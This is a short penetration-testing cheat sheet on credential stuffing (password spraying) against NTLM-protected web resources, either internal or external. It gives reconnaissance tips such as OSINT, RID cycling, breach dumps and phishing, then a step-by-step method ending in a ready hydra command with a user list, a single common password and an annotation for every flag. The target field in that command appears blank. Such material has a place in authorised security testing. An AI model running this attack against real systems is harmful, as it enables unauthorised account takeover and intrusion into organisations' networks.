Skip to main content

NTLM Credential Stuffing (Internal/External)

NTLM Basic Authentication

  • Could obtain a list of usernames via OSINT, or via something like RID cycling from a foothold.
  • Might be able to find a common default credential in a prior breach dump, phishing, or some other reconnaissance
  • The NTLM-authenticated resource could be externally-facing, or available internally post-compromise


  1. Open Developer Tools in the browser and go to the Network tab
  2. Enter a set of junk credentials and observe the HTTP response code for a failed login (eg. HTTP 401)
  3. Use hydra to perform a credential stuffing attack against the basic authentication page
# -I = do not read a restore file if present
# -V = very verbose output
# -L = list of usernames
# -p = single password
# = target
# http-get = hydra module
# '/:A=NTLM:F=401'
    # / = path to the login page
    # A=NTLM = NTLM authentication type
    # F=401 = failure code
hydra -I -V -L ./usernames.txt -p 'Changeme123' http-get '/:A=NTLM:F=401'